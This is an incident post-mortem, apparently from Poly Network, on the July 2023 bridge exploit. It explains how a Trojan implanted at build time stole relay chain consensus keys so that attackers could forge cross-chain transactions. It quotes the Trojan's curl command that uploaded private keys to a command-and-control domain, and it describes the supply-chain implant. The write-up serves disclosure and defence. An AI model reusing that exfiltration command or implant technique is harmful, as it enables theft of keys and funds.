The Poly Network Exploit Analysis
Overview
On July 2nd, 2023, Poly Network was exploited, resulting in 58 assets being affected across 11 blockchains. In response, the Poly Network team promptly initiated an investigation, dedicating resources to conduct a thorough analysis of the exploit. The detailed findings of this investigation are disclosed in the following article.
The exploiters implanted a Trojan virus in the program compilation environment to acquire the consensus keys of the Poly Network’s Relay Chain. Subsequently, they executed forged cross-chain transactions by transferring the original chain transaction to the attackers’ relay chain, manipulating the quantity of assets slated for unlocking on the target chain. The attackers then transitioned the attacker’s relay chain transaction to the target chain. The target chain contract verified the relay chain signature, leading to the release of the corresponding modified asset amount to the attackers’ wallet addresses.
Exploit Details
1. 136 Exploited Transactions: link to sheet
2. 58 Affected Assets: link to sheet
3. Exploiters’ Addresses
The exploiters bypassed the Poly Network Relay Chain by forging cross-chain transactions, resulting in the theft of multiple assets on the target chain. Below are the addresses associated with the exploiters.
(1) On Ethereum
The attackers have consolidated valuable currencies into the following deposit addresses:
0xe0Afadad1d93704761c8550F21A53DE3468Ba599
0x8E0001966e6997db3e45c5F75D4C89a610255b2E
0xdddE20a5F569DFB11F5c405751367E939ebC5886
(2) On BNB Chain, Okx, Heco, Polygon, Optimism, Avalanche, Arbitrum, Andromeda, Fantom, Gnosis:
0xe0Afadad1d93704761c8550F21A53DE3468Ba599
Exploit Analysis
Regarding Poly Network’s cross-chain transactions, each transaction is relayed to the Poly Network’s Relay Chain. Once a transaction is finalized on the Poly Network Relay Chain, it is further relayed to the target chain, carrying a relayer chain header and a Merkle Proof , serving as inputs for verification to complete the cross-chain transactions.
Following the exploit, an immediate analysis of the exploited transaction on the target chain revealed the submission of a suspicious Poly Relay Chain block header, signed and successfully passing the signature verification. Upon comparing the height and hash, it became evident that this block header did not correspond to the block header of the operational Poly Network Relay Chain. Consequently, we inferred two potential exploit paths deployed by the hackers:
1. The hackers obtained the Poly Network Relay Chain consensus keys (2f+1) and signed forged block headers.
2. Exploiting a security vulnerability in the consensus node of the Poly Network Relay Chain, the hackers deceived the node into signing the forged block header.
Building upon these assumptions, we conducted the following analyses:
- We reviewed the consensus logic code of the Poly Network Relay Chain to identify any potential security loopholes. Following a comprehensive analysis involving multiple stakeholders, no suspicious security vulnerabilities were detected.
- We further explored the means by which the hackers might have acquired the consensus keys of the Poly Network Relay Chain. If hackers obtain at least 2f+1 consensus keys, and these consensus nodes are operated by multiple parties with the keys not controlled by a single entity, it is highly likely that they acquired these consensus keys by attacking the jointly operated program of the Poly Relay Chain’s consensus nodes.
Continuing from the second analysis, we examined the running mainnet programs, conducted sandbox behavior tests, and ultimately uncovered suspicious TCP connection behavior in one program:
The sandbox logs indicate that the program obtained the target address 199.188.201.24 through domain name resolution of pypa.tech and established a TCP connection. After confirmation by Operations and Maintenance (O&M), it was verified that this IP address is not associated with any potentially relevant service. Below is the historical information for this IP, primarily consisting of Trojan C2 details:
Through packet capture analysis, it was determined that the TCP connection is sending HTTPS requests. Further decompilation analysis of the executable file of this program revealed the presence of a suspicious Trojan program embedded in the program’s startup code block:
The analysis suggests that the Trojan code block likely accessed the local wallet file path and keys of the program, executing “curl -F xxx https://pypa.tech/xxx" via “os/exec.Command” to upload the private keys.
Following an experiment involving the replacement of the local “curl” executable file, we confirmed that the attackers indeed employed this Trojan implantation method.
By scrutinizing the hackers’ Trojan implantation pathway, it was uncovered that the attackers targeted the program’s compilation environment. It is probable that the Trojan was implanted during the program compilation process or before code compilation.
Searching pypa.tech with Whois, it was determined that the IP address is located in the United States.
Example of Exploited Transaction
Taking the asset ETH as an example:
The exploiters called the Poly Network Lockproxy contract on the BNB Chain to initiate a cross-chain transaction: https://bscscan.com/tx/0xc0361cd88cb734774db760f3aac2cd7477f59a0221a2c0ff8266318b7d6317a8.
The contract called was 0x2f7ac9436ba4B548f9582af91CA1Ef02cd2F1f03. The Lock asset is PolyNetwork ETH; the Lock amount is 0.000000000000001, the target chain is Ethereum, and the contract generated a cross-chain txid: 0000000000000000000000000000000000000000000000000000000000038308. The target chain Unlock contract is 0x250E76987D838A75310C34BF422EA9F1AC4CC906.
The corresponding Unlock transaction in the Lockproxy contract on the target chain-Ethereum (0x250E76987D838A75310C34BF422EA9F1AC4CC906) based on the original chain transaction is: https://etherscan.io/tx/0xe280153aa5d9c6cc3aa2ae6713ad8f91889fa6007485eb54318bd957b74776da. The Unlock Asset is ETH, the Unlock Amount is 1592.51818168432, the relay chain transaction hash is FF4458ACDF3DFB4644A291A0A046DB8B7CE42F6D81366AD5256962060DB8BC1A (process 1ABCB80D06626925D56A36816D2FE47C8BDB46A0A091A24446FB3DDFAC5844FF in the Poly Network’s Relay Chain format).
According to the transaction hash of the relay chain obtained from the target chain, the transaction has not occurred on the Poly Network’s Relay Chain.
According to the analysis of rawHeader (block header of relay chain transaction) of the Input Data of the target chain transaction, the block height of the relay chain is 30150181.
According to the original chain transaction hash, the transaction on Poly Network’s Relay Chain is: https://explorer.poly.network/tx/c0361cd88cb734774db760f3aac2cd7477f59a0221a2c0ff8266318b7d6317a8, the Poly Network’s Hash is 223BE4FEDAD15655E37E2B63CDAB76E91C7CC15AA31A2465F352A5CAFDEC8869, the Poly Network’s Transaction Height is 30307916.
According to Poly Network’s Relay Chain hash 223BE4FEDAD15655E37E2B63CDAB76E91C7CC15AA31A2465F352A5CAFDEC8869, the result of cross chain MakeTxParamArgs is
14
0000000000000000000000000000000000000000
14
e0afadad1d93704761c8550f21a53de3468ba599
e803000000000000000000000000000000000000000000000000000000000000
The corresponding Parameters:
Target chain Unlock asset: ETH(0000000000000000000000000000000000000000)
Target chain user: 0xe0afadad1d93704761c8550f21a53de3468ba599
Target chain Unlock amount: 0x03e8(process e803 accordingly in the Poly Network’s Relay Chain format, whose decimal conversion is 1000, which is 0.000000000000001 ETH)
Based on the above findings, we can draw the following conclusions:
- The legitimate transaction on Poly Network’s Relay Chain amounted to 0.000000000000001ETH to Ethereum, while the exploiters’ relay chain transaction totaled 1592.51818168432ETH.
- The block height of the authentic transaction on Poly Network’s Relay Chain is 30307916, contrasting with the attackers’ relay chain block height of 30150181.
- Successful execution of the exploiters’ relay chain transactions on the target chain signifies that the attackers have acquired the Poly Network Relay Chain consensus key.
Summary
The attackers implanted a Trojan virus into the program compilation environment, allowing them to acquire the consensus keys of Poly Network’s Relay Chain. Subsequently, they utilized these keys to forge cross-chain transactions. The hackers implanted a Trojan horse code block during the program compilation process, obtaining and uploading consensus keys during program startup. They then employed these keys to sign the block header of the forged Poly Network’s Relay Chain, ultimately submitting the forged cross-chain transactions and block header to the target chain to execute the cross-chain exploit.